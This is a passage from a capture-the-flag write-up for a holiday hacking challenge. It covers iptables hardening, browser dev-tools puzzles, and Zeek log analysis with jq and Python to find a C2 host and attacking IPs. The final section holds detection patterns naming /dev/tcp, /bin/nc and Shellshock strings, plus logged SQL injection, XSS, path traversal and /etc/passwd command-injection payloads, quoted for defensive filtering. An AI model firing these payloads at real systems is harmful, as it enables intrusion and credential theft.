target  prot opt source  destination

Chain OUTPUT (policy DROP)  
target  prot opt source  destination  
ACCEPT  all  --  anywhere  anywhere  ctstate RELATED,ESTABLISHED

Good job! We can now move onto the third rule.

  3. Create a rule to ACCEPT only remote source IP address 172.19.0.225 to access the local SSH server (on port 22).

For this one, we need to create a new INPUT rule that accepts NEW connections from the IP 172.19.0.225 to the SSH server on port 22. All other SSH connections will then be dropped by the default policy.

In iptables, to specify a source IP, we pass the -s option followed by the IP. For destination ports, we pass the --dport option followed by the port, which requires a protocol to be given with -p.

Knowing this, we can go ahead and create a rule that should look like the following:

elfuuser@d4664263e075:~$ sudo iptables -A INPUT -p tcp -s 172.19.0.225 --dport 22 -m conntrack --ctstate NEW -j ACCEPT

Once done, let’s check if it’s correct.

elfuuser@d4664263e075:~$ sudo iptables -L  
Chain INPUT (policy DROP)  
target  prot opt source  destination  
ACCEPT  all  --  anywhere  anywhere  ctstate RELATED,ESTABLISHED  
ACCEPT  tcp  --  172.19.0.225  anywhere  tcp dpt:22 ctstate NEW

Chain FORWARD (policy DROP)  
target  prot opt source  destination

Chain OUTPUT (policy DROP)  
target  prot opt source  destination  
ACCEPT  all  --  anywhere  anywhere  ctstate RELATED,ESTABLISHED

Nice, we got the proper rule in! Next one!

  4. Create a rule to ACCEPT any source IP to the local TCP services on ports 21 and 80.

For this one, we need to create a rule that will ACCEPT any traffic to the local services on ports 21 and 80.

We can pretty much reuse the previous rule and modify it a little bit. The newly created rules should look like the following:

elfuuser@d4664263e075:~$ sudo iptables -A INPUT -p tcp --dport 21 -m conntrack --ctstate NEW -j ACCEPT  
elfuuser@d4664263e075:~$ sudo iptables -A INPUT -p tcp --dport 80 -m conntrack --ctstate NEW -j ACCEPT
elfuuser@d4664263e075:~$ sudo iptables -L  
Chain INPUT (policy DROP)  
target  prot opt source  destination  
ACCEPT  all  --  anywhere  anywhere  ctstate RELATED,ESTABLISHED  
ACCEPT  tcp  --  172.19.0.225  anywhere  tcp dpt:22 ctstate NEW  
ACCEPT  tcp  --  anywhere  anywhere  tcp dpt:21 ctstate NEW  
ACCEPT  tcp  --  anywhere  anywhere  tcp dpt:80 ctstate NEW

Chain FORWARD (policy DROP)  
target  prot opt source  destination

Chain OUTPUT (policy DROP)  
target  prot opt source  destination  
ACCEPT  all  --  anywhere  anywhere  ctstate RELATED,ESTABLISHED

And that one is done! Onto the next one.

  5. Create a rule to ACCEPT all OUTPUT traffic with a destination TCP port of 80.

For this one, we need to create a rule that will allow all OUTPUT traffic going from the braces out to the internet on port 80.

Simple enough. The command for this one should look like so:

elfuuser@d4664263e075:~$ sudo iptables -A OUTPUT -p tcp --dport 80 -m conntrack --ctstate NEW -j ACCEPT  
elfuuser@d4664263e075:~$ sudo iptables -L  
Chain INPUT (policy DROP)  
target  prot opt source  destination  
ACCEPT  all  --  anywhere  anywhere  ctstate RELATED,ESTABLISHED  
ACCEPT  tcp  --  172.19.0.225  anywhere  tcp dpt:22 ctstate NEW  
ACCEPT  tcp  --  anywhere  anywhere  tcp dpt:21 ctstate NEW  
ACCEPT  tcp  --  anywhere  anywhere  tcp dpt:80 ctstate NEW

Chain FORWARD (policy DROP)  
target  prot opt source  destination

Chain OUTPUT (policy DROP)  
target  prot opt source  destination  
ACCEPT  all  --  anywhere  anywhere  ctstate RELATED,ESTABLISHED  
ACCEPT  tcp  --  anywhere  anywhere  tcp dpt:80 ctstate NEW

And there we have it! Onto the final rule!

  6. Create a rule applied to the INPUT chain to ACCEPT all traffic from the lo interface.

For this one, we need to create a rule that will ACCEPT all INPUT traffic that is coming from the loopback interface (lo) of the computer. In iptables, we can specify the incoming interface by passing the -i option followed by the interface name.

This command is also pretty easy and will look like so:

elfuuser@d4664263e075:~$ sudo iptables -A INPUT -i lo -j ACCEPT  
elfuuser@d4664263e075:~$ sudo iptables -L  
Chain INPUT (policy DROP)  
target  prot opt source  destination  
ACCEPT  all  --  anywhere  anywhere  ctstate RELATED,ESTABLISHED  
ACCEPT  tcp  --  172.19.0.225  anywhere  tcp dpt:22 ctstate NEW  
ACCEPT  tcp  --  anywhere  anywhere  tcp dpt:21 ctstate NEW  
ACCEPT  tcp  --  anywhere  anywhere  tcp dpt:80 ctstate NEW  
ACCEPT  all  --  anywhere  anywhere

Chain FORWARD (policy DROP)  
target  prot opt source  destination

Chain OUTPUT (policy DROP)  
target  prot opt source  destination  
ACCEPT  all  --  anywhere  anywhere  ctstate RELATED,ESTABLISHED  
ACCEPT  tcp  --  anywhere  anywhere  tcp dpt:80 ctstate NEW

Once that’s completed, just wait a few seconds and the challenge should be completed!

elfuuser@d4664263e075:~$
Kent TinselTooth: Great, you hardened my IOT Smart Braces firewall!
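For reference, the full rule set from this walkthrough can be collected in one place. The sketch below only builds and prints the command strings used above; it does not execute anything, and the function name smart_braces_rules is my own.

```python
def smart_braces_rules():
    """Build the iptables commands from this walkthrough, in order."""
    cmds = []
    # 1. Default policies
    for chain in ("INPUT", "FORWARD", "OUTPUT"):
        cmds.append(f"sudo iptables -P {chain} DROP")
    # 2. Established and related traffic
    for chain in ("INPUT", "OUTPUT"):
        cmds.append(
            f"sudo iptables -A {chain} -m conntrack "
            "--ctstate ESTABLISHED,RELATED -j ACCEPT"
        )
    # 3. SSH from a single source address
    cmds.append(
        "sudo iptables -A INPUT -p tcp -s 172.19.0.225 --dport 22 "
        "-m conntrack --ctstate NEW -j ACCEPT"
    )
    # 4. FTP and HTTP from anywhere
    for port in (21, 80):
        cmds.append(
            f"sudo iptables -A INPUT -p tcp --dport {port} "
            "-m conntrack --ctstate NEW -j ACCEPT"
        )
    # 5. Outbound HTTP
    cmds.append(
        "sudo iptables -A OUTPUT -p tcp --dport 80 "
        "-m conntrack --ctstate NEW -j ACCEPT"
    )
    # 6. Loopback traffic
    cmds.append("sudo iptables -A INPUT -i lo -j ACCEPT")
    return cmds


for cmd in smart_braces_rules():
    print(cmd)
```

Printing the commands rather than running them keeps the sketch safe to try anywhere; the output can be pasted into the terminal in one go.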

Open the Sleigh Shop Door

Upon successfully completing the Smart Braces CranPi, we can talk to Kent again for more hints that will allow us to complete the next objective.

For this challenge we need to open the Sleigh Shop door, as well as help Shinny Upatree solve a problem.

If we go to the Sleigh Shop door, we notice a crate and a locked door.

Kent mentioned something about a crate with some sort of locks on it, and about using our browser and the Chrome Dev Tools.

Well, let’s see what’s in this crate before we start making assumptions. Upon clicking the crate, we are taken to a new page with the following screen.

From the start we see that the crate contains the villain’s name, possibly the one behind hacking ElfU! There also seems to be some sort of lock on there with a riddle. Something about a console and scrolling a little?

Well if we remember correctly, Kent told us that we can probably use our developer console. So, let’s press F12 to open the developer console up, navigate to the Console tab, and scroll up.

Cool, we found a code! Entering that code unlocks the lock for us.

Scrolling down to the second lock and continuing to use our developer console, we can inspect the elements to find our second code.

The third lock mentions something about the code being “fetched”. I would assume that means the network. Let’s jump over to our Network tab, and we will see an image with the code needed to unlock the lock.

The fourth lock hints at local variables. In the browser, JavaScript can persist such values in something called localStorage.

Navigating to our Console tab, we can type localStorage and we will see our code!

The fifth lock asks us if we noticed something in the title. So if we use our Elements tab and scroll up to the <head> and <title> element, we will see our code at the end.

The sixth lock tells us that in order for the hologram to be effective, we need to increase the perspective. In CSS, perspective is a property that determines the distance between the z=0 plane and the user in order to give a 3D-positioned element some perspective.

So, using our Elements tab again, if we click on the hologram class, we will be able to see the CSS information on the right-hand side. Simply disable perspective, and we should see our code.

The seventh lock mentions something about the slick font that we are seeing. Again I’m assuming this is going to be something in the CSS for the font-family. So using the console, select the instructions class and look for the font. We should find our code there.

The eighth lock tells us that in the event that the .eggs go bad, someone will be sad. The event keyword is a big giveaway here. In web applications, an event listener is a function or object that handles an event dispatched to an EventTarget object.

Assuming that the .eggs element has an event tied to it, we can simply find it in our console, and on the left side, click on Event Listeners, which will reveal the code!

The ninth lock tells us that the next code will be “unredacted”, but only after all the chakras are active. The big keyword here is active. The :active CSS pseudo-class represents an element (such as a button) that is being activated by the user. When using a mouse, “activation” typically starts when the user presses down the primary mouse button.

If we follow the elements in the console, we will find some elements with the class chakra. We can simply force them into an active state by right clicking on them, going to Force state and selecting :active.

After all the chakras are active, we will get the code.

The tenth lock tells us that it’s out of commission and that we need to pop off the cover to see what’s missing. We can simply remove the cover by selecting its element in the console and pressing delete.

Once the cover is off, we can see that there is a button inside.

Pressing the button does nothing, but if we enter a fake code, and then press the button, it will generate an error for us in the Console tab.

Looking at the error we see that we are missing macaroni at the button element. Macaroni? What the heck does this mean? Well, as confused as we might be, let’s search for that term in the Elements tab.

Once we press enter, we find a component with the class macaroni. Simply select the line, and drag it down below the switch class for the tenth lock.

Repeating the same steps, we see that we are missing a cotton swab. So let’s do the same thing as before, but this time for the swab.

Repeating the process again, we see that we are missing a gnome.

Once all those pieces are in place, we notice that on the bottom left hand corner of the circuit board, there is the code! Entering that into the lock allows us to complete the challenge!

Upon reading this we know that The Tooth Fairy is the villain behind the hacks in ElfU!

Once we know this, we can then navigate to the eleventh objective in our badge and enter The Tooth Fairy to complete the objective!

Now that we broke into the crate, we can talk to Shinny Upatree to learn more about the crate and The Tooth Fairy’s plot.

Objective 12

Zeek JSON Analysis - CranPi

After completing objective 11 and gaining access to the Sleigh Shop, the second we walk into the room we spot the Tooth Fairy!

Talking to her we learn why she did what she did.

National Tooth Fairy Day being the most popular? Yeah, I don’t know how that’s going to really work out for all of us here. Ahhh… enough talking, we need to go save Santa and help his sleigh! Think of the children!

Inside the Sleigh Shop, past the Tooth Fairy, we will come across Wunorse Openslae.

Upon talking with Wunorse, we learn that he’s looking through some Zeek logs where he believes there’s a malicious C2 channel and he needs our help to find it.

Wunorse also tells us that we should use jq to find the longest connection time, and also provides us a hint about parsing Zeek JSON Logs with JQ.

After we read all that information, let’s access the terminal and see what we have to work with.

Some JSON files can get quite busy.
There's lots to see and do.
Does C&C lurk in our data?
JQ's the tool for you!

-Wunorse Openslae

Identify the destination IP address with the longest connection duration
using the supplied Zeek logfile. Run runtoanswer to submit your answer.

elf@48b87992755c:~$

Alright, so as we figured out before, we need to parse the Zeek logs with jq and find the IP address with the longest connection time. Seems easy enough! Let’s see where our log file is.

elf@48b87992755c:~$ ls
conn.log
elf@48b87992755c:~$ head -n 1 conn.log 
{"ts":"2019-04-04T20:34:24.698965Z","uid":"CAFvAu2l50Km67tSP5","id.orig_h":"192.168.144.130","id.orig_p":64277,"id.resp_h":"192.168.144.2","id.resp_p":53,"proto":"udp","service":"dns","duration":0.320463,"orig_bytes":94,"resp_bytes":316,"conn_state":"SF","missed_bytes":0,"history":"Dd","orig_pkts":2,"orig_ip_bytes":150,"resp_pkts":2,"resp_ip_bytes":372}

After reading the first event of the log, we see that there is a ton of data, and since it’s JSON, it’s messy. So, let’s pipe this into jq for better readability.

elf@48b87992755c:~$ head -n 1 conn.log | jq
{
  "ts": "2019-04-04T20:34:24.698965Z",
  "uid": "CAFvAu2l50Km67tSP5",
  "id.orig_h": "192.168.144.130",
  "id.orig_p": 64277,
  "id.resp_h": "192.168.144.2",
  "id.resp_p": 53,
  "proto": "udp",
  "service": "dns",
  "duration": 0.320463,
  "orig_bytes": 94,
  "resp_bytes": 316,
  "conn_state": "SF",
  "missed_bytes": 0,
  "history": "Dd",
  "orig_pkts": 2,
  "orig_ip_bytes": 150,
  "resp_pkts": 2,
  "resp_ip_bytes": 372
}

Much better! I used head -n 1 here just to look at the first conn.log record. The Zeek log event summarizes the connection including source and destination addresses, ports, protocol (TCP, UDP, or ICMP), service (DNS, HTTP, etc.), packets transferred, bytes exchanged, and more.

This is great and all, but we should really focus on the duration variable.

If you read through the hints provided to us, then you would have learned that with JQ you can select specific records from the Zeek log in your query. So for us to obtain the duration value for all connections, we just need to pass the '.duration' argument.

elf@48b87992755c:~$ head -n 10 conn.log | jq '.duration'
0.320463
0.000602
0.000923
0.00061
0.000602
0.00106
0.271645
0.000756
0.001645
0.001305

Awesome! The durations are decimal numbers, so we can sort this data to find the longest connection. Plain sort will not suffice, as it compares lines as text rather than as numbers. Here we use sort -V (“version” sort), which compares the digits before the decimal point numerically and is enough to surface the largest values; sort -n would be the more conventional choice for numeric data.
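The difference between sorting as text and sorting as numbers is easy to see in a few lines of Python. The sketch below uses four duration values borrowed from this log; nothing else about it comes from the challenge.

```python
durations = ["870.55667", "1019365.337758", "4333.288236", "59396.15014"]

# Text comparison goes character by character, so "8..." beats "1..."
as_text = sorted(durations, reverse=True)

# Converting to float first compares the actual magnitudes
as_numbers = sorted(durations, key=float, reverse=True)

print(as_text)
print(as_numbers)
```

Sorted as text, the 870 second connection ends up on top even though it is the shortest of the four, which is exactly the trap we want to avoid.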

So let’s grab the top 10 longest connections from our Zeek logs.

elf@48b87992755c:~$ cat conn.log | jq '.duration' | sort -r -V | grep -v "null" | head -n 10
1019365.337758
465105.432156
250451.490735
148943.160634
59396.15014
33074.076209
31642.774949
30493.79543
4333.288236
870.55667

So, we have the longest duration being about 1019365 seconds long, but we don’t know which IP that’s for!

Well don’t you worry! Luckily for us the jq select function allows us to perform a boolean operation on an identified field, returning the record if the operation returns true. We can use this to our advantage by selecting all of the records where the duration is equal to that of the highest duration, like so.

elf@48b87992755c:~$ cat conn.log | jq 'select(.duration == 1019365.337758)'
{
  "ts": "2019-04-18T21:27:45.402479Z",
  "uid": "CmYAZn10sInxVD5WWd",
  "id.orig_h": "192.168.52.132",
  "id.orig_p": 8,
  "id.resp_h": "13.107.21.200",
  "id.resp_p": 0,
  "proto": "icmp",
  "duration": 1019365.337758,
  "orig_bytes": 30781920,
  "resp_bytes": 30382240,
  "conn_state": "OTH",
  "missed_bytes": 0,
  "orig_pkts": 961935,
  "orig_ip_bytes": 57716100,
  "resp_pkts": 949445,
  "resp_ip_bytes": 56966700
}

After running that, it seems the possible C2 IP is 13.107.21.200. We can now execute the runtoanswer command and see if we are right.

elf@48b87992755c:~$ runtoanswer 
Loading, please wait......



What is the destination IP address with the longest connection duration? 13.107.21.200



Thank you for your analysis, you are spot-on.
I would have been working on that until the early dawn.
Now that you know the features of jq,
You'll be able to answer other challenges too.

-Wunorse Openslae

Congratulations!

And there we have it, we helped Wunorse find the C2 IP!
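For comparison, the same lookup can be done in a single pass without sorting at all. This is a rough Python sketch, assuming the log holds one JSON object per line as conn.log does; the function name longest_connection and the 10.0.0.1 sample address are made up.

```python
import json


def longest_connection(lines):
    """Return the record with the largest 'duration', or None if there is none."""
    best = None
    for line in lines:
        line = line.strip()
        if not line:
            continue
        record = json.loads(line)
        duration = record.get("duration")
        if duration is None:
            continue  # some records have no duration (jq prints null for these)
        if best is None or duration > best["duration"]:
            best = record
    return best


# Tiny inline sample; with the real log you could pass an open file instead,
# e.g. longest_connection(open("conn.log"))
sample = [
    '{"id.resp_h": "192.168.144.2", "duration": 0.320463}',
    '{"id.resp_h": "13.107.21.200", "duration": 1019365.337758}',
    '{"id.resp_h": "10.0.0.1"}',
]
print(longest_connection(sample)["id.resp_h"])
```

Keeping only the current maximum means the whole log never has to be held in memory, which helps with larger captures.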

Filter Out Poisoned Sources of Weather Data

Upon successfully completing the Zeek JSON Analysis CranPi, we can talk to Wunorse again for more hints that will allow us to complete the next objective.

Oh no, we have a big problem on our hands! It seems someone is forging false weather data which is causing issues for Santa’s sleigh route!

For this objective, we’re supposed to use the data supplied in the Zeek JSON logs to identify the IP addresses of attackers poisoning Santa’s flight mapping software. We must then block the 100 offending sources of information to guide Santa’s sleigh through the attack.

It seems simple enough, but how do we know what’s bad data and what’s good data? Well if we paid attention to Wunorse, he mentioned something about seeing LFI, XSS, Shellshock, and SQLi in the Zeek logs. Unfortunately for us, it seems Wunorse forgot the login as well… oh man.

Either way, this is a great starting point. Since we already worked with Zeek logs and jq, this should be pretty easy for us!

Alright, so with a starting point, let’s try to access the Sleigh Route Finder API and see what we have to work with.

Ahh darn, we need that login to move on further! Let’s see… think, think. What can we do?

Oh yes, that’s right! Remember how we decrypted that Sleigh Route Finder document back in objective 10? Well let’s look into that PDF to see if we get any hints!

If we scroll through, we should find information about the default credentials!

So it seems that the credentials are in the readme in the ElfU Research Labs git repository, which we have no clue where it is.

Okay, hold on. We have the Zeek logs, so let’s download them and parse the data to see if we can find a URL to the readme.

NOTE: Since the Zeek logs provided to us are nested in an array ([]), we need to use .[] followed by the value we want to search when using jq to properly parse the data.
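To make the note concrete: in Python terms, this file is a single JSON list of records rather than one record per line, so it is loaded once and then iterated. The sketch below is a hedged equivalent of searching the uri field for a readme; the helper name uris_containing and the three inline sample records are illustrative only.

```python
import json


def uris_containing(records, needle):
    """Return the distinct URIs that contain `needle`, sorted."""
    return sorted({r["uri"] for r in records if needle in r.get("uri", "")})


# Inline stand-in for the real file; with http.log on disk you could use
# json.load(open("http.log")) instead
sample = json.loads(
    '[{"uri": "/README.md"}, {"uri": "/14.10/Google/"}, {"uri": "/cgi-bin/README.TXT"}]'
)
print(uris_containing(sample, "README"))
```

The set comprehension removes duplicate URIs, which is handy because the same path tends to be requested many times.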

root@kali:~/HH/sleigh_route# wget https://downloads.elfu.org/http.log.gz
--2020-01-04 19:46:42--  https://downloads.elfu.org/http.log.gz
Resolving downloads.elfu.org (downloads.elfu.org)... 45.79.14.68
Connecting to downloads.elfu.org (downloads.elfu.org)|45.79.14.68|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4499255 (4.3M) [application/octet-stream]
Saving to: ‘http.log.gz’

http.log.gz                               100%[=====================================================================================>]   4.29M  9.14MB/s    in 0.5s    

2020-01-04 19:46:43 (9.14 MB/s) - ‘http.log.gz’ saved [4499255/4499255]

root@kali:~/HH/sleigh_route# ls
http.log.gz
root@kali:~/HH/sleigh_route# gzip -d http.log.gz 
root@kali:~/HH/sleigh_route# ls
http.log

root@kali:~/HH/sleigh_route# cat http.log | jq '.[].uri' | grep "README"
"/README.md"
"/README/"
"/cgi-bin/README.TXT"

Awesome, we found a README.md file, which usually appears in all git repositories. Let’s see if we can navigate to that URL in the browser.

Perfect, we found some credentials! Using these credentials we can now log into the application.

Once in the application, we can navigate to the Firewall section and there we will see where we can enter the offending IPs. Right, so let’s get to work and start looking for bad data!

First, let’s see what kind of values we have to work with in the Zeek logs. This will give us a better idea of what we can use to query for malicious data.

root@kali:~/HH/sleigh_route# head -1 http.log | jq
[
  {
    "ts": "2019-10-05T06:50:42-0800",
    "uid": "ClRV8h1vYKWXN1G5ke",
    "id.orig_h": "238.27.231.56",
    "id.orig_p": 60677,
    "id.resp_h": "10.20.3.80",
    "id.resp_p": 80,
    "trans_depth": 1,
    "method": "GET",
    "host": "srf.elfu.org",
    "uri": "/14.10/Google/",
    "referrer": "-",
    "version": "1.0",
    "user_agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)",
    "origin": "-",
    "request_body_len": 0,
    "response_body_len": 232,
    "status_code": 404,
    "status_msg": "Not Found",
    "info_code": "-",
    "info_msg": "-",
    "tags": "(empty)",
    "username": "-",
    "password": "-",
    "proxied": "-",
    "orig_fuids": "-",
    "orig_filenames": "-",
    "orig_mime_types": "-",
    "resp_fuids": "FUPWLQXTNsTNvf33",
    "resp_filenames": "-",
    "resp_mime_types": "text/html"
  },

That’s a lot of data we can parse! We have everything from User Agents, to the URI, to even the username and password. We know that there might have been some SQL injection attacks, so let’s parse the username field using jq to see if there were any SQL injection attempts.

root@kali:~/HH/sleigh_route# cat http.log | jq '.[].username' | grep -v "-"
"q1ki9"
"servlet"
"support"
"admin"
"Admin"
"admin"
"admin"
"q1ki9"
"6666"
"6666"
"6666"
"' or '1=1"
"' or '1=1"
"' or '1=1"
"' or '1=1"
"root"
"comcomcom"
"(empty)"
"(empty)"
"(empty)"
"admin"

Okay, so we found some SQL injection attacks, but we need to find the IP that’s associated with each attack. So, using some jq magic, we can print several values on one line by using the -j (join output) parameter followed by the values we want.

If you’re confused on how to use jq, then I suggest going back and reading “Parsing Zeek JSON Logs with JQ” which was provided to us by Wunorse as a hint.

root@kali:~/HH/sleigh_route# cat http.log | jq -j '.[] | .username, ", ", .["id.orig_h"], "\n"' | grep -v "-"
q1ki9, 191.85.145.190
servlet, 142.115.169.193
support, 9.95.164.154
admin, 40.213.20.94
Admin, 88.78.129.76
admin, 75.172.126.182
admin, 168.145.213.152
q1ki9, 248.150.13.189
6666, 98.69.67.75
6666, 104.82.104.120
6666, 208.14.190.102
' or '1=1, 33.132.98.193
' or '1=1, 84.185.44.166
' or '1=1, 254.140.181.172
' or '1=1, 150.50.77.238
root, 241.226.125.123
comcomcom, 135.118.158.216
(empty), 11.82.10.31
(empty), 187.100.107.131
(empty), 234.119.70.73
admin, 188.127.212.14
(empty), 216.225.250.249
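
For readers who would rather stay in Python, the same username-to-IP pairing can be sketched as below. This is only a minimal sketch: it assumes http.log is a single JSON array of records (as the jq `.[]` queries above imply), the function names `load_records` and `usernames_with_ips` are made up for illustration, and the two sample records are trimmed down to the fields that matter.

```python
import json


def load_records(path):
    """Load the Zeek HTTP log, assumed here to be one JSON array of records."""
    with open(path) as fh:
        return json.load(fh)


def usernames_with_ips(records):
    """Return (username, source IP) pairs for records that carry a username."""
    return [
        (rec["username"], rec["id.orig_h"])
        for rec in records
        if rec.get("username", "-") != "-"   # "-" is the placeholder for "not set"
    ]


# Two records trimmed to the relevant fields; values come from the output above.
sample = [
    {"username": "-", "id.orig_h": "238.27.231.56"},
    {"username": "' or '1=1", "id.orig_h": "33.132.98.193"},
]

for user, ip in usernames_with_ips(sample):
    print(f"{user}, {ip}")
```

Unlike `grep -v "-"`, which drops every line containing a dash anywhere, this only skips records whose username is exactly the `-` placeholder. Against the real log, `usernames_with_ips(load_records("http.log"))` would be the equivalent call.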

Alright, we found some bad IPs, let’s save those to a list for safe keeping!

Now let’s stop here for a second. Doing all of these queries manually against all the values, and trying to search for different attacks one at a time, is going to be very tedious. What we need to do is create some sort of query and script that will iterate through all the possible keys in the Zeek logs, and run a jq query that will look for everything from SQL injection to Shellshock.

And that’s exactly what I did. After some time spent writing the query, mine looked something like so.

cat http.log | jq -r '.[] | select(.user_agent | contains ("%") 
or contains ("/etc/") 
or contains ("UNION") 
or contains ("SELECT") 
or contains ("{ :; }") 
or contains ("alert(")  
or contains ("../") 
or contains ("onerror") 
or contains ("onload") 
or contains ("base64") 
or contains ("/dev/tcp") 
or contains ("sock") 
or contains ("/bin/nc") 
or contains ("/bash"))' | jq -j '(.user_agent, ", IP: ", .["id.orig_h"], "\n")'

Nice, we have a decent query! This one should get us a lot of data from the user_agent key, but I want to enumerate through all the keys. So let’s parse the keys from the Zeek logs, and save them to a file.

root@kali:~/HH/sleigh_route# cat http.log | jq '.[] | keys'
[
  "host",
  "id.orig_h",
  "id.orig_p",
  "id.resp_h",
  "id.resp_p",
  "info_code",
  "info_msg",
  "method",
  "orig_filenames",
  "orig_fuids",
  "orig_mime_types",
  "origin",
  "password",
  "proxied",
  "referrer",
  "request_body_len",
  "resp_filenames",
  "resp_fuids",
  "resp_mime_types",
  "response_body_len",
  "status_code",
  "status_msg",
  "tags",
  "trans_depth",
  "ts",
  "uid",
  "uri",
  "user_agent",
  "username",
  "version"
]

Once we clean up the keys, save them in a list. For me, I saved them in a file called keys.txt.
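
The clean-up step can also be scripted. The sketch below is one possible way to do it, not the method used in this write-up: it assumes the log has already been loaded into a list of dictionaries, and `unique_keys` and `write_keys` are hypothetical helper names. The sample records are cut down to a few fields for illustration.

```python
def unique_keys(records):
    """Return the sorted set of field names seen across all records."""
    keys = set()
    for rec in records:
        keys.update(rec.keys())
    return sorted(keys)


def write_keys(records, path="keys.txt"):
    """Write one key per line, the layout the later script reads back in."""
    with open(path, "w") as fh:
        fh.write("\n".join(unique_keys(records)) + "\n")


# Illustrative records, trimmed to a handful of fields.
sample = [
    {"ts": "2019-10-05T06:50:42-0800", "uri": "/14.10/Google/", "username": "-"},
    {"uri": "/README.md", "user_agent": "-"},
]

print(unique_keys(sample))
```

Because jq prints the key list once per record, collecting the keys into a set first removes the duplicates that would otherwise have to be cleaned up by hand.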

Now, using Python, let’s write a short script that will iterate through all the keys, select them, run the search query, and then finally print out the malicious data along with its IP.

The script will look like so.

import os

# Strings that suggest SQLi, XSS, LFI, Shellshock or a known-bad user agent.
indicators = ['%', '/etc/', 'UNION', 'SELECT', '{ :; }', 'alert(', '../', 'onerror', 'onload', 'RookIE', 'WinInet', 'CholTBAgent', 'Metasploit', 'Windos', 'avdscan', 'automatedscanning', '1=1', 'base64', '/dev/tcp', 'sock', '/bin/nc', '/bash']
# Build a jq filter of the form: contains("a") or contains("b") or ...
match = ' or '.join('contains("' + i + '")' for i in indicators)

with open('keys.txt') as f:
    for line in f:
        key = line.strip()
        # Select records whose value for this key matches, then print the value and source IP.
        command = 'cat http.log | jq -r \'.[] | select(.["' + key + '"] | ' + match + ')\' | jq -j \'(.["' + key + '"], ", IP: ", .["id.orig_h"], "\\n")\''
        os.system(command)

Upon executing the script, we should get the following output:

root@kali:~/HH/sleigh_route# python3 run.py 
<script>alert(\"automatedscanning\");</script>, IP: 61.110.82.125
<script>alert(automatedscanning)</script>, IP: 65.153.114.120
<script>alert('automatedscanning');</script>&action=item, IP: 123.127.233.97
<script>alert(\"automatedscanning\");</script>&from=add, IP: 95.166.116.45
<script>alert('automatedscanning');</script>&function=search, IP: 80.244.147.207
<script>alert(\"automatedscanning\")</script><img src=\", IP: 168.66.108.62
<script>alert(\"avdscan-681165131\");d(', IP: 200.75.228.240
/api/weather?station_id=1' UNION SELECT NULL,NULL,NULL--, IP: 42.103.246.250
/logout?id=<script>alert(1400620032)</script>&ref_a=avdsscanning\"><script>alert(1536286186)</script>, IP: 56.5.47.137
/api/weather?station_id=<script>alert(1)</script>.html, IP: 19.235.69.221
/api/measurements?station_id=<script>alert(60602325)</script>, IP: 69.221.145.150
/api/weather?station_id=<script>alert(autmatedsacnningist)</script>, IP: 42.191.112.181
/api/weather?station_id=<script>alert(automatedscaning)</script>, IP: 48.66.193.176
/api/stations?station_id=<script>alert('automatedscanning')</script>, IP: 49.161.8.58
/api/weather?station_id=<script>alert('automatedscanning');</script>, IP: 84.147.231.129
/api/stations?station_id=<script>alert(\"automatedscanning\")</script>, IP: 44.74.106.131
/api/weather?station_id=<script>alert(\"automatedscanning\")</script>;, IP: 106.93.213.219
/api/weather?station_id=1' UNION SELECT 0,0,username,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM xmas_users WHERE 1, IP: 2.230.60.70
/logout?id=1' UNION SELECT null,null,'autosc','autoscan',null,null,null,null,null,null,null,null/*, IP: 10.155.246.29
/api/weather?station_id=1' UNION/**/SELECT 302590057/*, IP: 225.191.220.138
/logout?id=1' UNION/**/SELECT 1223209983/*, IP: 75.73.228.192
/api/login?id=1' UNION/**/SELECT/**/0,1,concat(2037589218,0x3a,323562020),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, IP: 249.34.9.16
/api/weather?station_id=1' UNION/**/SELECT/**/0,1,concat(2037589218,0x3a,323562020),3,4,5,6,7,8,9,10,11,12,13,14,15,16, IP: 27.88.56.114
/api/weather?station_id=1' UNION/**/SELECT/**/0,1,concat(2037589218,0x3a,323562020),3,4,5,6,7,8,9,10,11,12,13,14,15,16, IP: 238.143.78.114
/api/weather?station_id=1' UNION+SELECT+1,1416442047, IP: 121.7.186.163
/api/stations?station_id=1' UNION SELECT 1,'automatedscanning','5e0bd03bec244039678f2b955a2595aa','',0,'',''/*&password=MoAOWs, IP: 106.132.195.153
/api/weather?station_id=1' UNION SELECT 2,'admin','$1$RxS1ROtX$IzA1S3fcCfyVfA9rwKBMi.','Administrator'/*&file=index&pass=, IP: 129.121.121.48
/api/weather?station_id=1' UNION SELECT 1434719383,1857542197 --, IP: 190.245.228.38
/api/measurements?station_id=1' UNION SELECT 1434719383,1857542197 --, IP: 34.129.179.28
/api/stations?station_id=1' UNION SELECT 1,2,'automatedscanning',4,5,6,7,8,9,10,11,12,13/*, IP: 135.32.99.116
/api/weather?station_id=1' UNION/**/SELECT/**/2015889686,1,288214646/*, IP: 2.240.116.254
/api/weather?station_id=1' UNION/**/SELECT/**/850335112,1,1231437076/*, IP: 45.239.232.245
/api/weather?station_id="/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd, IP: 102.143.16.184
/sockets/, IP: 115.98.64.96
/api/weather?station_id=../../../../../../../../../../bin/cat /etc/passwd\\x00|, IP: 230.246.50.221
/api/stations?station_id=|cat /etc/passwd|, IP: 131.186.145.73
/api/weather?station_id=;cat /etc/passwd, IP: 253.182.102.55
/api/login?id=cat /etc/passwd||, IP: 229.133.163.235
/api/weather?station_id=`/etc/passwd`, IP: 23.49.177.78
/api/weather?station_id=/../../../../../../../../../../../etc/passwd, IP: 223.149.180.133
/api/login?id=/../../../../../../../../../etc/passwd, IP: 187.178.169.123
/api/weather?station_id=/../../../../../../../../etc/passwd, IP: 116.116.98.205
/api/weather?station_id=/etc/passwd, IP: 9.206.212.33
/api/login?id=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd, IP: 28.169.41.122
/cgi-bin/bash, IP: 56.147.40.116
Mozilla/4.0 (compatible; MSIE 7.0; Windos NT 6.0), IP: 48.66.193.176
Mozilla/4.0 (compatible; MSIE 7.0; Windos NT 6.0), IP: 22.34.153.164
Mozilla/4.0 (compatible; Metasploit RSPEC), IP: 203.68.29.5
Mozilla/4.0 (compatible; Metasploit RSPEC), IP: 84.147.231.129
CholTBAgent, IP: 135.32.99.116
CholTBAgent, IP: 103.235.93.133
Mozilla/5.0 WinInet, IP: 2.240.116.254
Mozilla/5.0 WinInet, IP: 253.65.40.39
